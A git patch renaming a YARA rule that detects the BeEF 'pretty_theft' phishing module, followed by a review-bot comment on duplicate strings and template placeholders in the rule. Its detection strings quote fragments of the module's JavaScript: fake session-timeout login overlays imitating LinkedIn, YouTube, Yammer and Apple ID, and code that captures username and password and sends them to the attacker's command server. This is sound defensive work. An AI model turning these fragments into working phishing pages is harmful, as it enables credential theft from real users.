From c644eace1f6af623efa276020d4d7cb93bc6920d Mon Sep 17 00:00:00 2001
From: mmorenog <mmorenog@users.noreply.github.com>
Date: Fri, 18 Dec 2015 09:09:48 +0100
Subject: [PATCH] Rename Beef_pretty_theft.yar to EXPERIMENTAL_Beef_pretty_theft.yar

---
 malware/Beef_pretty_theft.yar              | 42 ------------------------------------------
 malware/EXPERIMENTAL_Beef_pretty_theft.yar | 42 ++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 42 insertions(+), 42 deletions(-)
 delete mode 100644 malware/Beef_pretty_theft.yar
 create mode 100644 malware/EXPERIMENTAL_Beef_pretty_theft.yar

diff --git a/malware/Beef_pretty_theft.yar b/malware/Beef_pretty_theft.yar
deleted file mode 100644
index 1fc6a9c..0000000
--- a/malware/Beef_pretty_theft.yar
+++ /dev/null
@@ -1,42 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-/*
-	Yara Rule Set
-	Author: Pasquale Stirparo
-	Date: 2015-10-08
-	Identifier: src_ptheft
-*/
-
-/* Rule Set ----------------------------------------------------------------- */
-
-rule src_ptheft_command {
-	meta:
-		description = "Auto-generated rule - file command.js"
-		author = "Pasquale Stirparo"
-		reference = "not set"
-		date = "2015-10-08"
-		hash = "49c0e5400068924ff87729d9e1fece19acbfbd628d085f8df47b21519051b7f3"
-	strings:
-		$s0 = "var lilogo = 'http://content.linkedin.com/etc/designs/linkedin/katy/global/clientlibs/img/logo.png';" fullword wide ascii /* score: '38.00' */
-		$s1 = "dark=document.getElementById('darkenScreenObject'); " fullword wide ascii /* score: '21.00' */
-		$s2 = "beef.execute(function() {" fullword wide ascii /* score: '21.00' */
-		$s3 = "var logo  = 'http://www.youtube.com/yt/brand/media/image/yt-brand-standard-logo-630px.png';" fullword wide ascii /* score: '32.42' */
-		$s4 = "description.text('Enter your Apple ID e-mail address and password');" fullword wide ascii /* score: '28.00' */
-		$s5 = "sneakydiv.innerHTML= '<div id=\"edge\" '+edgeborder+'><div id=\"window_container\" '+windowborder+ '><div id=\"title_bar\" ' +ti" wide ascii /* score: '28.00' */
-		$s6 = "var logo  = 'https://www.yammer.com/favicon.ico';" fullword wide ascii /* score: '27.42' */
-		$s7 = "beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);" fullword wide ascii /* score: '26.00' */
-		$s8 = "var title = 'Session Timed Out <img src=\"' + lilogo + '\" align=right height=20 width=70 alt=\"LinkedIn\">';" fullword wide ascii /* score: '24.00' */
-		$s9 = "var title = 'Session Timed Out <img src=\"' + logo + '\" align=right height=20 width=70 alt=\"YouTube\">';" fullword wide ascii /* score: '24.00' */
-		$s10 = "var title = 'Session Timed Out <img src=\"' + logo + '\" align=right height=24 width=24 alt=\"Yammer\">';" fullword wide ascii /* score: '24.00' */
-		$s11 = "var logobox = 'style=\"border:4px #84ACDD solid;border-radius:7px;height:45px;width:45px;background:#ffffff\"';" fullword wide ascii /* score: '21.00' */
-		$s12 = "sneakydiv.innerHTML= '<br><img src=\\''+imgr+'\\' width=\\'80px\\' height\\'80px\\' /><h2>Your session has timed out!</h2><p>For" wide ascii /* score: '23.00' */
-		$s13 = "inner.append(title, description, user,password);" fullword wide ascii /* score: '23.00' */
-		$s14 = "sneakydiv.innerHTML= '<div id=\"window_container\" '+windowborder+ '><div id=\"windowmain\" ' +windowmain+ '><div id=\"title_bar" wide ascii /* score: '23.00' */
-		$s15 = "sneakydiv.innerHTML= '<div id=\"window_container\" '+windowborder+ '><div id=\"windowmain\" ' +windowmain+ '><div id=\"title_bar" wide ascii /* score: '23.00' */
-		$s16 = "answer = document.getElementById('uname').value+':'+document.getElementById('pass').value;" fullword wide ascii /* score: '22.00' */
-		$s17 = "password.keydown(function(event) {" fullword wide ascii /* score: '21.01' */
-	condition:
-		13 of them
-}
diff --git a/malware/EXPERIMENTAL_Beef_pretty_theft.yar b/malware/EXPERIMENTAL_Beef_pretty_theft.yar
new file mode 100644
index 0000000..1fc6a9c
--- /dev/null
+++ b/malware/EXPERIMENTAL_Beef_pretty_theft.yar
@@ -0,0 +1,42 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+/*
+	Yara Rule Set
+	Author: Pasquale Stirparo
+	Date: 2015-10-08
+	Identifier: src_ptheft
+*/
+
+/* Rule Set ----------------------------------------------------------------- */
+
+rule src_ptheft_command {
+	meta:
+		description = "Auto-generated rule - file command.js"
+		author = "Pasquale Stirparo"
+		reference = "not set"
+		date = "2015-10-08"
+		hash = "49c0e5400068924ff87729d9e1fece19acbfbd628d085f8df47b21519051b7f3"
+	strings:
+		$s0 = "var lilogo = 'http://content.linkedin.com/etc/designs/linkedin/katy/global/clientlibs/img/logo.png';" fullword wide ascii /* score: '38.00' */
+		$s1 = "dark=document.getElementById('darkenScreenObject'); " fullword wide ascii /* score: '21.00' */
+		$s2 = "beef.execute(function() {" fullword wide ascii /* score: '21.00' */
+		$s3 = "var logo  = 'http://www.youtube.com/yt/brand/media/image/yt-brand-standard-logo-630px.png';" fullword wide ascii /* score: '32.42' */
+		$s4 = "description.text('Enter your Apple ID e-mail address and password');" fullword wide ascii /* score: '28.00' */
+		$s5 = "sneakydiv.innerHTML= '<div id=\"edge\" '+edgeborder+'><div id=\"window_container\" '+windowborder+ '><div id=\"title_bar\" ' +ti" wide ascii /* score: '28.00' */
+		$s6 = "var logo  = 'https://www.yammer.com/favicon.ico';" fullword wide ascii /* score: '27.42' */
+		$s7 = "beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);" fullword wide ascii /* score: '26.00' */
+		$s8 = "var title = 'Session Timed Out <img src=\"' + lilogo + '\" align=right height=20 width=70 alt=\"LinkedIn\">';" fullword wide ascii /* score: '24.00' */
+		$s9 = "var title = 'Session Timed Out <img src=\"' + logo + '\" align=right height=20 width=70 alt=\"YouTube\">';" fullword wide ascii /* score: '24.00' */
+		$s10 = "var title = 'Session Timed Out <img src=\"' + logo + '\" align=right height=24 width=24 alt=\"Yammer\">';" fullword wide ascii /* score: '24.00' */
+		$s11 = "var logobox = 'style=\"border:4px #84ACDD solid;border-radius:7px;height:45px;width:45px;background:#ffffff\"';" fullword wide ascii /* score: '21.00' */
+		$s12 = "sneakydiv.innerHTML= '<br><img src=\\''+imgr+'\\' width=\\'80px\\' height\\'80px\\' /><h2>Your session has timed out!</h2><p>For" wide ascii /* score: '23.00' */
+		$s13 = "inner.append(title, description, user,password);" fullword wide ascii /* score: '23.00' */
+		$s14 = "sneakydiv.innerHTML= '<div id=\"window_container\" '+windowborder+ '><div id=\"windowmain\" ' +windowmain+ '><div id=\"title_bar" wide ascii /* score: '23.00' */
+		$s15 = "sneakydiv.innerHTML= '<div id=\"window_container\" '+windowborder+ '><div id=\"windowmain\" ' +windowmain+ '><div id=\"title_bar" wide ascii /* score: '23.00' */
+		$s16 = "answer = document.getElementById('uname').value+':'+document.getElementById('pass').value;" fullword wide ascii /* score: '22.00' */
+		$s17 = "password.keydown(function(event) {" fullword wide ascii /* score: '21.01' */
+	condition:
+		13 of them
+}
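Review bot: `$s14` and `$s15` in `src_ptheft_command` are byte-identical, so they always match together and count twice toward `13 of them`; the condition can be met by as few as 12 distinct strings. Drop `$s15` (or replace it with a different line from the sample) and restate the threshold against the 17 distinct strings that remain. `$s7` still contains what look like unrendered template placeholders (`<%= @command_url %>`, `<%= @command_id %>`), so it probably matches only the on-disk module template and not the script as served to a browser. If that scope is intended, say so in `description`, for example `description = "BeEF pretty_theft module template (command.js) on disk"`. Since the file is being marked EXPERIMENTAL, `reference = "not set"` is also worth filling in so analysts can trace the rule's origin when triaging a hit.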
--
libgit2 0.26.0